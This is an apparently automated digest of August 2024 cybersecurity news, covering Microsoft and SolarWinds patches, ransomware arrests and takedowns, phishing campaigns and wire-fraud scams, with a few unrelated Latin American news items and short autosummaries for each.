          Autosummary: "Multiple security missteps were present in the course of this campaign, including the following: Exposing environment variables, using long-lived credentials, and absence of least privilege architecture," Palo Alto Networks Unit 42 said in a Thursday report. "


          Russian national sentenced to 40 months for selling stolen data on the dark web

          rusia-ucrania
          2024-08-16 https://securityaffairs.com/167146/deep-web/russian-national-sentenced-40-months.html
          A Russian national was sentenced to over three years in prison for selling stolen information and credentials on a dark web marketplace. The 27-year-old Russian national Georgy Kavzharadze (also known as “George,” “TeRorPP,” “Torqovec,” and “PlutuSS”) has been sentenced to over three years in prison for selling financial information, login credentials, and other personal data on […] "

          Autosummary: The 27-year-old Russian national Georgy Kavzharadze (also known as “George,” “TeRorPP,” “Torqovec,” and “PlutuSS”) has been sentenced to over three years in prison for selling financial information, login credentials, and other personal data on the dark web marketplace, Slilpp. "


          CISA adds SolarWinds Web Help Desk bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-16 https://securityaffairs.com/167157/security/cisa-adds-solarwinds-web-help-desk-bug-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a SolarWinds Web Help Desk bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SolarWinds Web Help Desk deserialization of untrusted data vulnerability, tracked as CVE-2024-28986 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. This week SolarWinds fixed the […] "

Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SolarWinds Web Help Desk deserialization of untrusted data vulnerability, tracked as CVE-2024-28986 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. "


          How a BEC scam cost a company $60 Million – Week in security with Tony Anscombe

          financial
          2024-08-16 https://www.welivesecurity.com/en/videos/how-a-bec-scam-cost-a-company-60-million-week-in-security-with-tony-anscombe/
          Business email compromise (BEC) has once again proven to be a costly issue, with a company losing $60 million in a wire transfer fraud scheme "

          Autosummary: "


          A massive cyber attack hit Central Bank of Iran and other Iranian banks

          financial
          2024-08-15 https://securityaffairs.com/167066/hacking/cyberattack-central-bank-of-iran.html
An Iranian news outlet reported that a major cyber attack targeted the Central Bank of Iran (CBI) and several other banks, causing disruptions. Iran International reported that a massive cyber attack disrupted operations of the Central Bank of Iran (CBI) and several other banks in the country. The attack crippled the computer systems of the banks […] "

Autosummary: An Iranian news outlet reported that a major cyber attack targeted the Central Bank of Iran (CBI) and several other banks, causing disruptions. "


Argentina's ex-president accused of abusing partner

          latam
          2024-08-15 https://www.bbc.com/news/articles/c935njzn004o
Alberto Fernández's ex-partner alleges psychological threats and physical aggression - charges he denies. "

          Autosummary: "


          Microsoft patches bug that could have allowed an attacker to revert your computer back to an older, vulnerable version

          exploits
          2024-08-15 https://www.malwarebytes.com/blog/news/2024/08/microsoft-patches-bug-that-could-have-allowed-an-attacker-to-revert-your-computer-back-to-an-older-vulnerable-version
          A researcher used two Windows vulnerabilities to perform downgrade attacks. These flaws have now been patched by Microsoft "

          Autosummary: "


          GitHub Vulnerability "ArtiPACKED" Exposes Repositories to Potential Takeover

          exploits
          2024-08-15 https://thehackernews.com/2024/08/github-vulnerability-artipacked-exposes.html
A newly discovered attack vector in GitHub Actions artifacts dubbed ArtiPACKED could be exploited to take over repositories and gain access to organizations' cloud environments. "A combination of misconfigurations and security flaws can make artifacts leak tokens, both of third party cloud services and GitHub tokens, making them available for anyone with read access to the repository to consume, "

          Autosummary: "A combination of misconfigurations and security flaws can make artifacts leak tokens, both of third party cloud services and GitHub tokens, making them available for anyone with read access to the repository to consume," Palo Alto Networks Unit 42 researcher Yaron Avital said in a report published this week. "


          Black Basta ransomware gang linked to a SystemBC malware campaign

          exploits ransomware
          2024-08-15 https://securityaffairs.com/167079/cyber-crime/black-basta-ransomware-systembc-campaign.html
          Experts linked an ongoing social engineering campaign, aimed at deploying the malware SystemBC, to the Black Basta ransomware group. Rapid7 researchers uncovered a new social engineering campaign distributing the SystemBC dropper to the Black Basta ransomware operation. On June 20, 2024, Rapid7 researchers detected multiple attacks consistent with an ongoing social engineering campaign being tracked […] "

Autosummary: Experts linked an ongoing social engineering campaign, aimed at deploying the malware SystemBC, to the Black Basta ransomware group. "


          Critical RCE bug in SolarWinds Web Help Desk fixed (CVE-2024-28986)

          exploits
          2024-08-15 https://www.helpnetsecurity.com/2024/08/15/cve-2024-28986/

          SolarWinds has fixed a critical vulnerability (CVE-2024-28986) in its Web Help Desk (WHD) solution that may allow attackers to run commands on the host machine. “While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing. However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available,” the company advises. About CVE-2024-28986 SolarWinds Web Help Desk … More

          The post Critical RCE bug in SolarWinds Web Help Desk fixed (CVE-2024-28986) appeared first on Help Net Security.

          "

Autosummary: The latter step is not the last, because they will also have to copy-paste some files and manually modify a file, but luckily SolarWinds explains the whole procedure clearly in the security advisory, as well as offering instructions on how to uninstall the hotfix (if needed). "


          Russian-Linked Hackers Target Eastern European NGOs and Media

          rusia-ucrania
          2024-08-15 https://thehackernews.com/2024/08/russian-linked-hackers-target-eastern.html
          Russian and Belarusian non-profit organizations, Russian independent media, and international non-governmental organizations active in Eastern Europe have become the target of two separate spear-phishing campaigns orchestrated by threat actors whose interests align with that of the Russian government. While one of the campaigns – dubbed River of Phish – has been attributed to COLDRIVER, an "

          Autosummary: "When the cost of discovery remains low, phishing remains not only an effective technique, but a way to continue global targeting while avoiding exposing more sophisticated (and expensive) capabilities to discovery," the Citizen Lab said. "


          Ransomware gang deploys new malware to kill security software

          exploits
          2024-08-15 https://www.bleepingcomputer.com/news/security/ransomware-gang-deploys-new-malware-to-kill-security-software/
          RansomHub ransomware operators have been spotted deploying new malware to disable Endpoint Detection and Response (EDR) security software in Bring Your Own Vulnerable Driver (BYOVD) attacks [...] "

          Autosummary: "After the malware creates a new service for the driver, starts the service, and loads the driver, it enters an endless loop that continuously enumerates the running processes, terminating processes if their name appears in a hardcoded list of targets," Klopsch added. "


          Dozens of Google products targeted by scammers via malicious search ads

          financial
          2024-08-15 https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads
          In a clever scheme designed to abuse Google in more than one way, scammers are redirecting users to browser locks. "

          Autosummary: Indicators of Compromise Google advertiser accounts 08141293921851408385 Dhruv 06037672575822200833 Looker Studio URLs lookerstudio[.]google[.]com/embed/reporting/fa7aca93-cabd-47bf-bae3-cb5e299c8884/ lookerstudio[.]google[.]com/embed/reporting/42b6f86d-2a06-4b38-9f94-808a75572bb8/ lookerstudio[.]google[.]com/embed/reporting/fbd88a24-af73-4c76-94dc-5c55345e291d/ Figure 3: A fake Google home page, displayed via Looker Studio rendering an image Opening Developer Tools in Chrome, we can see that the “Google search page” is indeed just one large image: Figure 4: The actual image for the so-called Google home page What’s interesting is how this image is used as a lure that requires some user interaction to trigger an action. "


          Millions more Colombians living in conflict zones - NGO

          latam
          2024-08-15 https://www.bbc.com/news/articles/c8rxkr830lgo
          The number of Colombians faced by armed groups has gone up hugely, the Norwegian Refugee Council warns. "

Autosummary: Jess Wanless/NRC Migrants heading north have to cross the Gulf of Urabá by boat before embarking on the dangerous trek across the Darién Gap. Eight years after the Colombian government signed a peace agreement with the country's largest rebel group, the Revolutionary Armed Forces of Colombia (Farc), violence has reached "devastating" levels, according to the NRC. "


          Harry and Meghan meet Colombian vice-president on visit

          latam
          2024-08-15 https://www.bbc.com/news/articles/ce31qld552lo
          Francia Márquez hosts Prince Harry and Meghan at her official residence in Bogota. "

          Autosummary: "


          Cybersecurity jobs available right now: August 14, 2024

          ciber
          2024-08-14 https://www.helpnetsecurity.com/2024/08/14/cybersecurity-jobs-available-right-now-august-14-2024/

Cloud Security Specialist EPAM Systems | Chile | Remote – View job details As a Cloud Security Specialist, you will be responsible for creating and maintaining security policies and assisting in the implementation and automation of security solutions within cloud environments. Assist in CSPM tool testing and scoring and CSPM strategic tool implementation. Create and maintain Logic Apps for automation of responses and tickets and create KPI reporting. Support GIS Engineering initiatives. Cloud Security Specialist … More

          The post Cybersecurity jobs available right now: August 14, 2024 appeared first on Help Net Security.

          "

Autosummary: Senior Manager, Cloud Security Operations Vanguard | Japan | Remote – View job details As a Senior Manager, Cloud Security Operations, you will oversee the development and delivery of IT security standards and best practices, conduct formal incident investigations, lead advanced incident handling scenarios including internal and external data breaches and abnormal network and host activity, and assess risk derived from a platform or data lake. Cyber Security Network Engineer Mitsubishi Chemical Europe | Germany | On-site – View job details As a Cyber Security Network Engineer, you will be responsible for the support, administration, planning and further development of the Cisco network infrastructure (LAN/WLAN) as well as the European WAN, the firewall, VPN and security systems. Information Security Analyst Jumia Group | Egypt | On-site – View job details As an Information Security Analyst, you will contribute to the improvement of processes and procedures by analyzing process performance data and measures, comparing process performance against performance targets, reporting process performance information, and recommending changes to processes, performance measures and/or targets to maximize process performance. Information Security Manager Whizmo | UAE | On-site – View job details As an Information Security Manager, you will develop, enforce, and govern security policies to protect critical data, information, and knowledge assets. Information Security Specialist – Red Team Operator TD | Canada | Hybrid – View job details As an Information Security Specialist – Red Team Operator, you will conduct penetration testing for network, system, application, mobile, traditional web and wireless. "


          Microsoft Issues Patches for 90 Flaws, Including 10 Critical Zero-Day Exploits

          exploits
          2024-08-14 https://thehackernews.com/2024/08/microsoft-issues-patches-for-90-flaws.html
          Microsoft on Tuesday shipped fixes to address a total of 90 security flaws, including 10 zero-days, of which six have come under active exploitation in the wild. Of the 90 bugs, seven are rated Critical, 79 are rated Important, and one is rated Moderate in severity. This is also in addition to 36 vulnerabilities that the tech giant resolved in its Edge browser since last month. The Patch Tuesday "

Autosummary: Four of the below CVEs are listed as publicly known - CVE-2024-38200 (CVSS score: 7.5) - Microsoft Office Spoofing Vulnerability; CVE-2024-38199 (CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability; CVE-2024-21302 (CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability; CVE-2024-38202 (CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability. "An attacker could leverage this vulnerability by enticing a victim to access a specially crafted file, likely via a phishing email," Scott Caveza, staff research engineer at Tenable, said about CVE-2024-38200. "


          UK Prime Minister Keir Starmer and Prince William deepfaked in investment scam campaign

          financial
          2024-08-14 https://www.bitdefender.com/blog/hotforsecurity/uk-prime-minister-keir-starmer-and-prince-william-deepfaked-in-investment-scam-campaign/
Scammers are once again using deepfake technology to dupe unwary Facebook and Instagram users into making unwise cryptocurrency investments. AI-generated videos promoting the fraudulent cryptocurrency trading platform Immediate Edge have used deepfake footage of British Prime Minister Sir Keir Starmer and His Royal Highness Prince William to reach an estimated 890,000 people via Meta's social media platforms. Read more in my article on the Hot for Security blog. "

          Autosummary: In one example, deepfake video footage of Sir Keir Starmer assured viewers that "this is not a scam", while claiming they had been selected to earn a "life-changing" amount of money: "Your life is about to change. "


          Kootenai Health data breach impacted 464,000 patients

          financial
          2024-08-14 https://securityaffairs.com/167020/data-breach/kootenai-health-data-breach.html
          Kootenai Health suffered a data breach impacting over 464,000 patients following a 3AM ransomware attack. Kootenai Health disclosed a data breach impacting over 464,088 patients following the leak of their personal information by the ThreeAM (3AM) ransomware gang. Kootenai Health is a healthcare organization based in Coeur d’Alene, Idaho. It is a regional medical center […] "

          Autosummary: The attackers gained access to patients’ names, dates of birth, Social Security numbers, driver’s licenses or government-issued identification numbers, medical record numbers, medical treatment and condition information, medical diagnoses, medication information, and health insurance information. "


          Microsoft Patch Tuesday security updates for August 2024 addressed six actively exploited bugs

          exploits
          2024-08-14 https://securityaffairs.com/167000/security/microsoft-patch-tuesday-august-2024.html
          Microsoft’s August 2024 Patch Tuesday addressed 90 vulnerabilities, including six that are actively exploited. Patch Tuesday security updates for August 2024 addressed 90 vulnerabilities in Microsoft products including Windows and Windows Components; Office and Office Components; .NET and Visual Studio; Azure; Co-Pilot; Microsoft Dynamics; Teams; and Secure Boot and others, bringing the total to 102 […] "

Autosummary: Patch Tuesday security updates for August 2024 addressed 90 vulnerabilities in Microsoft products including Windows and Windows Components; Office and Office Components; .NET and Visual Studio; Azure; Co-Pilot; Microsoft Dynamics; Teams; and Secure Boot and others, bringing the total to 102 when including third-party bugs. Microsoft’s August 2024 Patch Tuesday addressed 90 vulnerabilities, including six that are actively exploited. "


          Belarusian-Ukrainian Hacker Extradited to U.S. for Ransomware and Cybercrime Charges

          exploits ransomware rusia-ucrania
          2024-08-14 https://thehackernews.com/2024/08/belarusian-ukrainian-hacker-extradited.html
          A coalition of law enforcement agencies coordinated by the U.K. National Crime Agency (NCA) has led to the arrest and extradition of a Belarussian and Ukrainian dual-national believed to be associated with Russian-speaking cybercrime groups. Maksim Silnikau (aka Maksym Silnikov), 38, went by the online monikers J.P. Morgan, xxx, and lansky. He was extradited to the U.S. from Poland on August 9,

          Autosummary: "On various occasions, Silnikau allegedly distributed information and tools to Ransom Cartel participants, including information about compromised computers, such as stolen credentials, and tools such as those designed to encrypt or 'lock' compromised computers," the DoJ noted.


          AutoCanada discloses cyberattack impacting internal IT systems

          ciber
          2024-08-14 https://www.bleepingcomputer.com/news/security/autocanada-discloses-cyberattack-impacting-internal-it-systems/
          Hackers targeted AutoCanada in a cyberattack last Sunday that impacted the automobile dealership group's internal IT systems, which may lead to disruptions. [...]

          Autosummary: “The CDK outage disrupted operations resulting in lost sales and profits, OEM inventory grew across the industry causing higher days supply in key brands and impacting floorplan costs, and rising unemployment combined with falling GDP in a still elevated rate environment perpetuated consumer uncertainty.” - Paul Antony, AutoCanada’s Chairman. In numbers, AutoCanada recorded losses of $33.1 million in Q2 2024, whereas in the same quarter last year, it had a profit of $45.2 million.


          SolarWinds fixes critical RCE bug affecting all Web Help Desk versions

          exploits
          2024-08-14 https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rce-bug-affecting-all-web-help-desk-versions/
          A critical vulnerability in SolarWinds' Web Help Desk solution for customer support could be exploited to achieve remote code execution, the American business software developer warns in a security advisory today. [...]



          Ransomware kingpin who called himself “J P Morgan” extradited to United States

          exploits government
          2024-08-14 https://www.tripwire.com/state-of-security/ransomware-kingpin-who-called-himself-j-p-morgan-extradited-united-states
          An investigation dating back almost ten years has seen the extradition this week to the United States of a man suspected to be the head of one of the world's most prolific Russian-speaking cybercriminal gangs. The UK's National Crime Agency (NCA) says it has been investigating a cybercriminal using the online handle "J P Morgan" since 2015, alongside parallel investigations run by the United States FBI and Secret Service. Read more in my article on the Tripwire State of Security blog.

          Autosummary: Spanish police, supported by officers from UK and US law enforcement agencies, arrested 38-year-old Maksim Silnikau, also known as Maksym Silnikov, at an apartment in Estepona, southern Spain, in July 2023.


          Black Basta-Linked Attackers Target Users with SystemBC Malware

          exploits
          2024-08-14 https://thehackernews.com/2024/08/black-basta-linked-attackers-targets.html
          An ongoing social engineering campaign with alleged links to the Black Basta ransomware group has been linked to "multiple intrusion attempts" with the goal of conducting credential theft and deploying a malware dropper called SystemBC. "The initial lure being utilized by the threat actors remains the same: an email bomb followed by an attempt to call impacted users and offer a fake solution,"



          Russian who sold 300,000 stolen credentials gets 40 months in prison

          rusia-ucrania
          2024-08-14 https://www.bleepingcomputer.com/news/security/russian-who-sold-300-000-stolen-credentials-gets-40-months-in-prison/
          Georgy Kavzharadze, a 27-year-old Russian national, has been sentenced to 40 months in prison for selling login credentials for over 300,000 accounts on Slilpp, the largest online marketplace of stolen logins, until its seizure in June 2021. [...]

          Autosummary: Largest online market for stolen credentials: the U.S. Department of Justice announced the takedown of Slilpp on June 10, 2021, following a joint operation with law enforcement agencies from the United States, Germany, the Netherlands, and Romania, who seized servers used to host Slilpp's infrastructure.


          Key metrics for monitoring and improving ZTNA implementations

          industry
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/dean-hamilton-wilson-perumal-company-ztna-implementation/

          In this Help Net Security interview, Dean Hamilton, CTO at Wilson Perumal & Company, discusses the complexities of zero trust network access (ZTNA) implementation, focusing on balancing security with operational efficiency. Hamilton highlights strategic planning, collaboration between IT and business leaders, adapting to emerging challenges, continuous improvement, and using metrics to assess ZTNA success and manage risks. ZTNA implementation is associated with increased IT spending and operational complexity. How can businesses strike a balance between … More

          The post Key metrics for monitoring and improving ZTNA implementations appeared first on Help Net Security.

          Autosummary: Careful up-front investment in three key areas is critical to finding balance for IT and avoiding adverse impacts on the business: Enterprise Architecture (EA) management is the practice of documenting and understanding how IT resources (infrastructure, services, applications, and data) align with business objectives, organizational elements, and business processes. While some of that spending is associated with licenses for enablement technologies that provide granular network segmentation, policy management, policy enforcement, device assessment, etc., the majority of the increased cost comes from the operational overhead required to define and maintain granular network and application access policies that are calibrated to the specific needs of each business. Metrics:
          • Rate of valid business user trouble tickets requiring policy modification
          • Time to resolve business user policy-related tickets
          • Time to detect policy misconfiguration
          • Time to resolve policy misconfiguration
          • Engagement of non-IT end-users in policy updates
          • Cybersecurity literacy of executives and business leaders
          What new challenges and opportunities should organizations anticipate as they refine their ZTNA strategies?


          Ukraine Warns of New Phishing Campaign Targeting Government Computers

          financial government
          2024-08-13 https://thehackernews.com/2024/08/ukraine-warns-of-new-phishing-campaign.html
          The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign that masquerades as the Security Service of Ukraine to distribute malware capable of remote desktop access. The agency is tracking the activity under the name UAC-0198. More than 100 computers are estimated to have been infected since July 2024, including those related to government bodies in the



          International investigation shuts down Radar/Dispossessor ransomware group

          exploits ransomware
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/radar-dispossessor-disruption/

          FBI Cleveland announced the disruption of “Radar/Dispossessor”—the criminal ransomware group led by the online moniker “Brain”—and the dismantling of three U.S. servers, three United Kingdom servers, 18 German servers, eight U.S.-based criminal domains, and one German-based criminal domain. Since its inception in August 2023, Radar/Dispossessor has quickly developed into an internationally impactful ransomware group, targeting and attacking small-to-mid-sized businesses and organizations from the production, development, education, healthcare, financial services, and transportation sectors. Originally focused on … More

          The post International investigation shuts down Radar/Dispossessor ransomware group appeared first on Help Net Security.

          Autosummary: Originally focused on entities in the United States, the investigation discovered 43 companies as victims of the attacks, from countries including Argentina, Australia, Belgium, Brazil, Honduras, India, Canada, Croatia, Peru, Poland, the United Kingdom, the United Arab Emirates, and Germany.


          FBI Shuts Down Dispossessor Ransomware Group's Servers Across U.S., U.K., and Germany

          exploits ransomware
          2024-08-13 https://thehackernews.com/2024/08/fbi-shuts-down-dispossessor-ransomware.html
          The U.S. Federal Bureau of Investigation (FBI) on Monday announced the disruption of online infrastructure associated with a nascent ransomware group called Dispossessor (aka Radar). The effort saw the dismantling of three U.S. servers, three United Kingdom servers, 18 German servers, eight U.S.-based criminal domains, and one German-based criminal domain. Dispossessor is said to be led by

          Autosummary: As many as 43 companies have been identified as victims of Dispossessor attacks, including those located in Argentina, Australia, Belgium, Brazil, Canada, Croatia, Germany, Honduras, India, Peru, Poland, the U.A.E., the U.K., and the U.S. Dispossessor first emerged in August 2023 as a ransomware-as-a-service (RaaS) group following the same dual-extortion model pioneered by other e-crime gangs.


          CERT-UA warns of a phishing campaign targeting government entities

          financial government
          2024-08-13 https://securityaffairs.com/166970/apt/cert-ua-warns-security-service-of-ukraine-campaign.html
          CERT-UA warned that a Russia-linked actor is impersonating the Security Service of Ukraine (SSU) in a new phishing campaign to distribute malware. The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign targeting organizations in the country, including government entities. The campaign, tracked as UAC-0198, has been active since July. Threat actors sent out […]

          Autosummary: “In reality, clicking the link downloads an MSI file (e.g., “Scan_docs#40562153.msi”), which, when opened, triggers the ANONVNC (MESHAGENT) malware.”


          How to Prevent Your First AI Data Breach

          financial
          2024-08-13 https://www.bleepingcomputer.com/news/security/how-to-prevent-your-first-ai-data-breach/
          Don"t let AI CoPilots be the source of your first data breach. Learn more from Varonis about the challengers of securing your data in the era of gen AI. [...] "

          Autosummary: Security challenges that come with enabling gen AI tools include:
          • Employees have access to far too much data
          • Sensitive data is often not labeled or is mislabeled
          • Insiders can quickly find and exfiltrate data using natural language
          • Attackers can discover secrets for privilege escalation and lateral movement
          • Right-sizing access is impossible to do manually
          • Generative AI can create new sensitive data rapidly
          These data security challenges aren't new, but they are highly exploitable, given the speed and ease at which gen AI surfaces information. It's a bad idea to let copilots loose in your organization if you're not confident that you know where you have sensitive data, what that sensitive data is, cannot analyze exposure and risks, and cannot close security gaps and fix misconfigurations efficiently.


          Ransom Cartel, Reveton ransomware owner arrested, charged in US

          exploits ransomware
          2024-08-13 https://www.bleepingcomputer.com/news/security/ransom-cartel-reveton-ransomware-owner-arrested-charged-in-us/
          Belarusian-Ukrainian national Maksim Silnikau was arrested in Spain and is now extradited to the USA to face charges for creating the Ransom Cartel ransomware operation in 2021 and running a malvertising operation from 2013 to 2022. [...]

          Autosummary: Co-conspirators Volodymyr Kadariya, a Belarussian and Ukrainian national, 38, and Andrei Tarasov, a Russian national, 33, were also charged for their role in the malvertising operation. - NCA. Maksim Silnikau faces significant legal consequences based on the charges in both indictments, including imprisonment sentences for wire fraud, computer fraud, computer fraud and abuse, aggravated identity theft, and access device fraud.


          Guardio Critical Security Alerts monitors and analyzes scam activities

          financial
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/guardio-critical-security-alerts/

          Guardio launched a new feature, Critical Security Alerts, which enables real-time alerts to identify and prevent financial scams, ensuring immediate intervention when suspicious browsing patterns are detected. According to the Federal Trade Commission, consumers in the United States lost over 10 billion dollars to fraud schemes. Bank transfers and fraudulent payments accounted for the highest losses, closely followed by cryptocurrency scams – all schemes that take place entirely online. Often, scammers approach a consumer with … More

          The post Guardio Critical Security Alerts monitors and analyzes scam activities appeared first on Help Net Security.


          Scammers dupe chemical company into wiring $60 million

          financial
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/orion-fraudulent-wire-transfers-60-million/

          Orion S.A., a global chemical company with headquarters in Luxembourg, has become a victim of fraud: it lost approximately $60 million through “multiple fraudulently induced outbound wire transfers to accounts controlled by unknown third parties.” The scammers targeted an employee. Orion S.A. is a manufacturer and supplier of carbon black, a solid form of carbon that’s used for manufacturing many everyday products, such as tires, textiles, and printing ink. “Orion has innovation centers on three … More

          The post Scammers dupe chemical company into wiring $60 million appeared first on Help Net Security.

          Autosummary: “The Company has cooperated, and will continue to cooperate, with law enforcement as appropriate, and intends to pursue recovery of these funds through all legally available means, including potentially available insurance coverage.”


          Australian gold mining company hit with ransomware

          exploits ransomware
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/evolution-mining-ransomware/

          Australian gold mining firm Evolution Mining has announced on Monday that it became aware on 8 August 2024 of a ransomware attack impacting its IT systems, and has been working with its external cyber forensic experts to investigate the incident. “Based on work to date, the Company believes the incident is now contained,” Evolution Mining said. “The Company does not anticipate any material impact on operations.” There has been no mention of data stolen before … More

          The post Australian gold mining company hit with ransomware appeared first on Help Net Security.


          GhostWrite: New T-Head CPU Bugs Expose Devices to Unrestricted Attacks

          exploits
          2024-08-13 https://thehackernews.com/2024/08/ghostwrite-new-t-head-cpu-bugs-expose.html
          A team of researchers from the CISPA Helmholtz Center for Information Security in Germany has disclosed an architectural bug impacting Chinese chip company T-Head's XuanTie C910 and C920 RISC-V CPUs that could allow attackers to gain unrestricted access to susceptible devices. The vulnerability has been codenamed GhostWrite. It has been described as a direct CPU bug embedded in the hardware, as

          Autosummary: "Improper validation in a model specific register (MSR) could allow a malicious program with ring0 access to modify SMM configuration while SMI lock is enabled, potentially leading to arbitrary code execution," AMD noted in an advisory, stating it intends to release updates to Original Equipment Manufacturers (OEM) to mitigate the issue.


          Microsoft August 2024 Patch Tuesday fixes 9 zero-days, 6 exploited

          exploits
          2024-08-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2024-patch-tuesday-fixes-9-zero-days-6-exploited/
          Today is Microsoft's August 2024 Patch Tuesday, which includes security updates for 89 flaws, including six actively exploited and three publicly disclosed zero-days. Microsoft is still working on an update for a tenth publicly disclosed zero-day. [...]

          Autosummary: The number of bugs in each vulnerability category is listed below:
          • 36 Elevation of Privilege Vulnerabilities
          • 4 Security Feature Bypass Vulnerabilities
          • 28 Remote Code Execution Vulnerabilities
          • 8 Information Disclosure Vulnerabilities
          • 6 Denial of Service Vulnerabilities
          • 7 Spoofing Vulnerabilities
          The number of bugs listed above does not include Microsoft Edge flaws that were disclosed earlier this month. The six actively exploited zero-day vulnerabilities in today's updates are: CVE-2024-38178 - Scripting Engine Memory Corruption Vulnerability. Microsoft says that the attack requires an authenticated client to click a link in order for an unauthenticated attacker to initiate remote code execution.


          Ivanti warns of critical vTM auth bypass with public exploit

          exploits
          2024-08-13 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-critical-vtm-auth-bypass-with-public-exploit/
          Today, Ivanti urged customers to patch a critical authentication bypass vulnerability impacting Virtual Traffic Manager (vTM) appliances that can let attackers create rogue administrator accounts. [...]

          Autosummary: The company also warned of a third zero-day (a server-side request forgery bug tracked as CVE-2024-21893) under mass exploitation in February, allowing threat actors to bypass authentication on unpatched ICS, IPS, and ZTA gateways.


          3AM ransomware stole data of 464,000 Kootenai Health patients

          exploits ransomware
          2024-08-13 https://www.bleepingcomputer.com/news/security/3am-ransomware-stole-data-of-464-000-kootenai-health-patients/
          Kootenai Health has disclosed a data breach impacting over 464,000 patients after their personal information was stolen and leaked by the 3AM ransomware operation. [...]



          Malwarebytes awarded Parent Tested Parent Approved Seal of Approval

          exploits
          2024-08-13 https://www.malwarebytes.com/blog/personal/2024/08/malwarebytes-awarded-parent-tested-parent-approved-seal-of-approval
          Malwarebytes has been awarded the Parent Tested Parent Approved Seal of Approval for product excellence.



          New Windows SmartScreen bypass exploited as zero-day since March

          exploits
          2024-08-13 https://www.bleepingcomputer.com/news/microsoft/new-windows-smartscreen-bypass-exploited-as-zero-day-since-march/
          Today, Microsoft revealed that a Mark of the Web security bypass vulnerability exploited by attackers as a zero-day to bypass SmartScreen protection was patched during the June 2024 Patch Tuesday. [...]

          Autosummary: Windows SmartScreen abused in malware attacks: in the March attacks, DarkGate malware operators exploited this Windows SmartScreen bypass (CVE-2024-21412) to deploy malicious payloads camouflaged as installers for Apple iTunes, Notion, NVIDIA, and other legitimate software.


          Microsoft fixes 6 zero-days under active attack

          exploits
          2024-08-13 https://www.helpnetsecurity.com/2024/08/13/microsoft-zero-days-under-attack/

          August 2024 Patch Tuesday is here, and Microsoft has delivered fixes for 90 vulnerabilities, six of which have been exploited in the wild as zero-days, and four are publicly known. The zero-days under attack: CVE-2024-38178 is a Scripting Engine Memory Corruption Vulnerability that could lead to remote code execution. Reported by AhnLab and South Korea’s National Cyber Security Center (NCSC), the flaw can be successfully exploited only if the target uses Microsoft Edge in Internet … More

          The post Microsoft fixes 6 zero-days under active attack appeared first on Help Net Security.

          Autosummary: This group includes two server-side request forgery (SSRF) flaws discovered by Tenable researchers, one (CVE-2024-38206) in Microsoft’s Copilot Studio (an AI-powered chatbot) that could lead to information disclosure, and the other (CVE-2024-38109) affecting Azure Health Bot, which can be abused to escalate privileges and access cross-tenant resources. CVE-2024-21302, an EoP flaw in Windows Secure Kernel Mode, and CVE-2024-38202, an EoP in the Windows Update Stack, were revealed by SafeBreach researcher Alon Leviev at Black Hat last week.


          A PoC exploit code is available for critical Ivanti vTM bug

          exploits
          2024-08-13 https://securityaffairs.com/166991/hacking/ivanti-virtual-traffic-manager-flaw.html
          Ivanti warned of a critical authentication bypass flaw in its Virtual Traffic Manager (vTM) appliances that can allow attackers to create rogue administrator accounts. Ivanti addressed a critical authentication bypass vulnerability, tracked as CVE-2024-7593 (CVSS score of 9.8), impacting Virtual Traffic Manager (vTM) appliances that can allow attackers to create rogue administrator accounts. Ivanti vTM […]

          Autosummary: A PoC exploit code is available for critical Ivanti vTM bug (Pierluigi Paganini, August 13, 2024). Ivanti warned of a critical authentication bypass flaw in its Virtual Traffic Manager (vTM) appliances that can allow attackers to create rogue administrator accounts.


          Why scammers want your phone number

          financial
          2024-08-13 https://www.welivesecurity.com/en/scams/scammers-phone-number/
          Your phone number is more than just a way to contact you – scammers can use it to target you with malicious messages and even exploit it to gain access to your bank account or steal corporate data.

          Autosummary: Apart from building fake online relationships, the tactics of many online fraudsters often involve creating scenarios that demand urgent action or rely on other ruses, including purported bank or PayPal account takeovers, devices compromised with malware, failed package deliveries, and even kidnapped relatives and other schemes leveraging artificial intelligence (AI). Raising the safety net: thankfully, there are a few ways people and businesses can stay free of phone scams. Validate: never answer or interact with unknown callers/senders, and whenever you receive a request for personal data from a “trusted” entity, call them first and ask whether the request you received was genuine. Throw me some numbers: let’s now look at how phone numbers fit into this, why they are, together with account login credentials, so valuable to scammers, and how they can be leveraged for malicious ends. Smishing and hacking: for starters, threat actors could target you with malware disguised as benign links or attachments that will, however, install spyware or other malware on your device or exfiltrate your personal data from it.


          74% of ransomware victims were attacked multiple times in a year

          exploits ransomware
          2024-08-12 https://www.helpnetsecurity.com/2024/08/12/74-of-ransomware-victims-were-attacked-multiple-times-in-a-year/

          An alarming trend toward multiple, sometimes simultaneous cyber attacks forces business leaders to re-evaluate their cyber resilience strategies to address common points of failure, including inadequate identity system backup and recovery practices, according to Semperis. A survey of nearly 1,000 IT and security professionals shows 83% of organizations were targeted by ransomware attacks in the past year with a high degree of success, sounding alarming trends in attack frequency, severity, and consequences. Companies are suffering successful … More

          The post 74% of ransomware victims were attacked multiple times in a year appeared first on Help Net Security.

